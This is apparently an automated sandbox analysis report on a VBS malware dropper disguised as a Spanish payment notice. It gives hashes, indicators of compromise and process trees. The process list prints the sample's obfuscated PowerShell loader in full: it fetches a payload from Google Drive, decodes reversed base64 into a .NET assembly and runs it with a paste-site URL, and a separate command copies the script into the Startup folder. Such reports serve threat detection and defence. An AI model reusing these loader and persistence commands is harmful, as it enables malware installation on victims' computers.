Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/11/2024, 21:23
Static task
static1
Behavioral task
behavioral1
Sample
COPIA_ANEXA_DOCUMENTO_DE_REPORTE_Y_NOTIFICACION_POR_SALDOS_PENDIENTES_DE_PAGO_CONCEPTO_OPERACIONES_M.vbs
Resource
win7-20240903-en
General
-
Target
COPIA_ANEXA_DOCUMENTO_DE_REPORTE_Y_NOTIFICACION_POR_SALDOS_PENDIENTES_DE_PAGO_CONCEPTO_OPERACIONES_M.vbs
-
Size
68KB
-
MD5
943b9220d27c71f1f97524ea87db7ebd
-
SHA1
d57a52c81bcff8ea2f4def7646aa9d4fb3dc9972
-
SHA256
370e7db7155cd9b03875431462ffc8223dcc4bf7c1dcb5a07420e84bc6316d93
-
SHA512
a6e66e74af19902ba71154a17f4625690638b57ba2fc419a19040bce1c5c3b81f64049687dd666d0471f6075675ad0c831ebedd8f0cfef1a6de28a65db9bff58
-
SSDEEP
1536:bUJW4Wrle/PhG+/kery+bGNccc3gt5pzKUGwm:jS7rgt5p3Gwm
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 2 2352 WScript.exe 4 2352 WScript.exe 8 2624 powershell.exe 10 2624 powershell.exe -
pid Process 2816 powershell.exe 2920 powershell.exe 2624 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 drive.google.com 8 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2052 cmd.exe 2712 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2712 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 2 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2816 powershell.exe 2920 powershell.exe 2624 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeDebugPrivilege 2624 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2352 wrote to memory of 2052 2352 WScript.exe 30 PID 2352 wrote to memory of 2052 2352 WScript.exe 30 PID 2352 wrote to memory of 2052 2352 WScript.exe 30 PID 2052 wrote to memory of 2712 2052 cmd.exe 32 PID 2052 wrote to memory of 2712 2052 cmd.exe 32 PID 2052 wrote to memory of 2712 2052 cmd.exe 32 PID 2052 wrote to memory of 2816 2052 cmd.exe 33 PID 2052 wrote to memory of 2816 2052 cmd.exe 33 PID 2052 wrote to memory of 2816 2052 cmd.exe 33 PID 2352 wrote to memory of 2920 2352 WScript.exe 34 PID 2352 wrote to memory of 2920 2352 WScript.exe 34 PID 2352 wrote to memory of 2920 2352 WScript.exe 34 PID 2920 wrote to memory of 2624 2920 powershell.exe 36 PID 2920 wrote to memory of 2624 2920 powershell.exe 36 PID 2920 wrote to memory of 2624 2920 powershell.exe 36
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\COPIA_ANEXA_DOCUMENTO_DE_REPORTE_Y_NOTIFICACION_POR_SALDOS_PENDIENTES_DE_PAGO_CONCEPTO_OPERACIONES_M.vbs"1⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\COPIA_ANEXA_DOCUMENTO_DE_REPORTE_Y_NOTIFICACION_POR_SALDOS_PENDIENTES_DE_PAGO_CONCEPTO_OPERACIONES_M.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\COPIA_ANEXA_DOCUMENTO_DE_REPORTE_Y_NOTIFICACION_POR_SALDOS_PENDIENTES_DE_PAGO_CONCEPTO_OPERACIONES_M.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9NRVs0XSskUFNob21FWzM0XSsnWCcpKCgnNVFWaW1hZ2VVcmwgPSBNVklodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFVeUhxd3JuWENsSycrJ0JKM2o2M0xsMXQyU3RWZ0d4YlN0MCBNVkk7NVFWd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2VudDs1UVZpbWFnZUJ5dGVzID0gNVFWd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YSg1UVZpbWFnZVVybCk7NVFWaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoNVFWaW1hZ2VCeXRlJysncyk7NScrJ1FWc3RhcnRGbGFnID0gTVZJPDxCQVNFNjRfU1RBUlQ+Pk0nKydWSTs1UVZlbmRGbGFnID0gTVZJPDxCQVNFNjRfRU5EPj5NVkk7NVFWJysnc3RhcnRJbmRleCA9IDVRVmltYWdlVGV4dC5JbmRleE9mKDVRVnN0YXJ0RmxhZyk7NVFWZW5kSW5kZXggPSA1UVZpbWFnZVRleHQuSW5kZXhPZig1UVZlbmRGJysnbGFnKTs1UVZzdGEnKydydEluZGV4IC1nZSAwIC1hbmQgNVFWZW5kSW5kZXggLWd0IDVRVnN0YXJ0SW5kJysnZXg7NVFWc3RhcnRJbmRleCArPSA1UVZzdGFydEZsYWcuTGVuZ3RoOzVRVmJhc2UnKyc2NCcrJ0xlbmd0aCA9IDVRVicrJ2VuZEluZGV4IC0gNVFWJysnc3RhcnRJbmRleDs1UVZiYXNlNjRDb21tYW5kID0nKycgNVFWaW1hZ2VUZXh0LlN1YnN0cmluZyg1UVZzdGFydEluZGV4LCA1UVZiYXNlNjRMZW5ndGgpOzVRVmJhc2U2NFJldmVyc2VkID0gLScrJ2pvaW4gKDVRVmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBaYlknKycgRm8nKydyRWFjaC1PYmplY3QgeyA1UVZfIH0pWy0xLi4tKDVRVmJhc2U2NCcrJ0NvbW1hJysnbmQuTGVuZ3RoKV07NScrJ1FWY29tbWFuZEJ5dGVzID0gW1N5c3RlbS4nKydDb252ZXJ0XTo6RnJvbUJhJysnc2U2JysnNFN0cmluZyg1UVZiYXNlNjRSZXZlcnNlZCk7NVFWJysnbCcrJ29hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDVRVmNvbW1hbmRCeXRlJysncyk7NVFWdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChNVklWQUlNVkkpOzVRVnZhaU1ldGhvZC4nKydJbnZva2UoNVFWbnVsbCwgQChNJysnVkkwL2F3aVNJLycrJ2QvZWUuZXRzYXAvLzpzcHR0aE1WSSwgTVZJZGUnKydzYXRpdmFkb01WSSwgTVZJZGVzYXRpdmFkb01WSSwgTVZJZGVzYXRpdmFkb01WSSwgTVZJTVNCdWlsZE1WSSwgTVZJZGVzYXRpdmFkb01WSSwgJysnTVZJZGVzYXRpdmFkb01WSSxNVklkZXNhdGl2YWRvTVZJLCcrJ01WSWRlc2F0aScrJ3ZhZG9NVkksTScrJ1ZJZGVzYXRpdmFkb01WSSxNVklkZXNhdGl2YWRvTVZJLE1WSWRlc2F0aXZhZCcrJ29NVkksJysnTVZJMU1WSSxNVklkZXNhdGl2JysnYWRvTVZJKSk7JykucmVwbGFjZSgoW2NIQVJdOTArW2NIQVJdOTgrW2NIQVJdODkpLFtzdFJpTkddW2NIQVJdMTI0KS5yZXBsYWNlKChbY0hBUl03NytbY0hBUl04NitbY0hBUl03MyksW3N0UmlOR11bY0hBUl0zOSkucmVwbGFjZSgnNVFWJyxbc3RSaU5HXVtjSEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShoME[4]+$PShomE[34]+'X')(('5QVimageUrl = MVIhttps://drive.google.com/uc?export=download&id=1UyHqwrnXClK'+'BJ3j63Ll1t2StVgGxbSt0 MVI;5QVwebClient = New-Object System.Net.WebCli'+'ent;5QVimageBytes = 5QVwebClient.'+'DownloadData(5QVimageUrl);5QVimageText = [System.Text.Encoding]::UTF8.GetString(5QVimageByte'+'s);5'+'QVstartFlag = MVI<<BASE64_START>>M'+'VI;5QVendFlag = MVI<<BASE64_END>>MVI;5QV'+'startIndex = 5QVimageText.IndexOf(5QVstartFlag);5QVendIndex = 5QVimageText.IndexOf(5QVendF'+'lag);5QVsta'+'rtIndex -ge 0 -and 5QVendIndex -gt 5QVstartInd'+'ex;5QVstartIndex += 5QVstartFlag.Length;5QVbase'+'64'+'Length = 5QV'+'endIndex - 5QV'+'startIndex;5QVbase64Command ='+' 5QVimageText.Substring(5QVstartIndex, 5QVbase64Length);5QVbase64Reversed = -'+'join (5QVbase64Command.ToCharArray() ZbY'+' Fo'+'rEach-Object { 5QV_ })[-1..-(5QVbase64'+'Comma'+'nd.Length)];5'+'QVcommandBytes = [System.'+'Convert]::FromBa'+'se6'+'4String(5QVbase64Reversed);5QV'+'l'+'oadedAssembly = [System.Reflection.Assembly]::Load(5QVcommandByte'+'s);5QVvaiMethod = [dnlib.IO.Home].GetMethod(MVIVAIMVI);5QVvaiMethod.'+'Invoke(5QVnull, @(M'+'VI0/awiSI/'+'d/ee.etsap//:sptthMVI, MVIde'+'sativadoMVI, MVIdesativadoMVI, MVIdesativadoMVI, MVIMSBuildMVI, MVIdesativadoMVI, '+'MVIdesativadoMVI,MVIdesativadoMVI,'+'MVIdesati'+'vadoMVI,M'+'VIdesativadoMVI,MVIdesativadoMVI,MVIdesativad'+'oMVI,'+'MVI1MVI,MVIdesativ'+'adoMVI));').replace(([cHAR]90+[cHAR]98+[cHAR]89),[stRiNG][cHAR]124).replace(([cHAR]77+[cHAR]86+[cHAR]73),[stRiNG][cHAR]39).replace('5QV',[stRiNG][cHAR]36) )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6SLSBRBKNIYQWPL6YPW6.temp
Filesize7KB
MD5fb7332f9d241431e053e897248f00c38
SHA1abb7242068a159d13253f2aa76f137c596793cc2
SHA256807b12d389a58eb7827983d49069d239f24d40795048d57b0ede2a15b3d4df34
SHA512751c5399188798798800ad7cab78c1137ca5ce77254c4440c890f8a8b062fb646614d32c0d3e83fd4b5c59d603868a15b1a33c73a033761728486ea4e761db6c